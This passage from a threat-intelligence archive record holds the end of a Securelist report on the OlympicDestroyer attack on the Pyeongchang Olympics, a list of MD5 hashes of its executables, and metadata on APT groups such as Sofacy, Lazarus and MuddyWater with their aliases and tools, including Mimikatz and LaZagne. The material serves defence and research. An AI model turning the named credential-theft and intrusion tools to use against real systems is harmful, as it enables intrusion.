This and several other TTPs have in the past been used by the Sofacy APT\r\ngroup, a widely known Russian-language threat actor. A year ago we published our research about the Lazarus APT group\r\nusing false flags in attacks against banks around the world that pointed to a Russian origin. Was it payback from Russian-speaking Sofacy or was it someone else trying to frame Sofacy? The muddied waters of this case mean we are yet to get a\r\nclear answer.\r\nThere are some open questions about the attacker’s motivation in this story. We know that the attackers had administrative\r\naccounts in the affected networks. By deleting backups and destroying all local data they could have easily devastated the\r\nOlympic infrastructure. Instead, they decided to do some “light” destruction: wiping files on Windows shares, resetting\r\nevent logs, deleting backups, disabling Windows services and rebooting systems into an unbootable state. When you add in\r\nthe multiple similarities to TTPs used by other actors and malware, intentional false flags and relatively good opsec, it\r\nmerely raises more questions as to the purpose of all this.\r\nAs we see it, these are some of the possible motives behind the attack:\r\n1. Demonstration of power/skills in the context of a secret communication that we’re unaware of. The potential for\r\nfull-blown, highly destructive cybersabotage might be a strong argument in top-secret political negotiations.\r\n2. Testing of destructive worm capability, but with lower impact to avoid too much attention from potential\r\ninvestigators and general public (in case of human error or operational failure).\r\n3. 
Trap threat intel researchers in a field of false flags and, based on their responses, learn how to implement the\r\nperfect false flag.\r\nThe last option makes sense when you consider that the malware contained a wiper that wasn’t used to wipe its own\r\ncomponents – the authors wanted it to be discovered.\r\nFor a powerful attacker, learning how to reliably craft false flags and trick researchers into attributing the attack to someone\r\nelse can mean gaining the ultimate cover – total immunity against attribution. But this kind of rocket science requires real-life experiments.\r\nWe think the carefully orchestrated OlympicDestroyer campaign played a very important role that will shape APT research\r\nin the future. While it didn’t fully sabotage the Winter Olympic games in Pyeongchang, its effects were noticed not only in\r\nSouth Korea but also in Europe. Most importantly, it brings with it a potential threat to the attribution process, undermining\r\ntrust in intel research findings.\r\nThere’s a lesson to be taken from this attack that’s useful for all of us in threat intelligence – don’t rush with attribution. This\r\nis a very delicate subject that should be handled with great care. 
We as an industry shouldn’t sacrifice the accuracy of our\r\nresearch to opportunistically promote business.\r\nKnown OlympicDestroyer executables\r\n0311CEC923C57A435E735E106517797F\r\n104ECBC2746702FA6ECD4562A867E7FB\r\n12668F8D072E89CF04B9CBCD5A3492E1\r\n19C539FF2C50A0EFD52BB5B93D03665A\r\n221C6DB5B60049E3F1CDBB6212BE7F41\r\n3514205D697005884B3564197A6E4A34\r\n3C0D740347B0362331C882C2DEE96DBF\r\n47E67D1C9382D62370A0D71FECC5368B\r\n4C8FA3731EFD2C5097E903D50079A44D\r\n4F43F03783F9789F804DCF9B9474FA6D\r\n51545ABCF4F196095ED102B0D08DEA7E\r\n52775F24E230C96EA5697BCA79C72C8E\r\n567D379B87A54750914D2F0F6C3B6571\r\n5778D8FF5156DE1F63361BD530E0404D\r\n583F05B4F1724ED2EBFD06DD29064214\r\n58DD6099F8DF7E5509CEE3CB279D74D5\r\n59C3F3F99F44029DE81293B1E7C37ED2\r\n64AA21201BFD88D521FE90D44C7B5DBA\r\n65C024D60AF18FFAB051F97CCDDFAB7F\r\n68970B2CD5430C812BEF5B87C1ADD6EA\r\n6E0EBEEEA1CB00192B074B288A4F9CFE\r\n7C3BF9AB05DD803AC218FC7084C75E96\r\n83D8D40F435521C097D3F6F4D2358C67\r\n86D1A184850859A6A4D1C35982F3C40E\r\nSource: https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/"
	],
	"report_names": [
		"84295"
	],
	"threat_actors": [
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434598,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.pdf",
		"text": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.txt",
		"img": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.jpg"
	}
}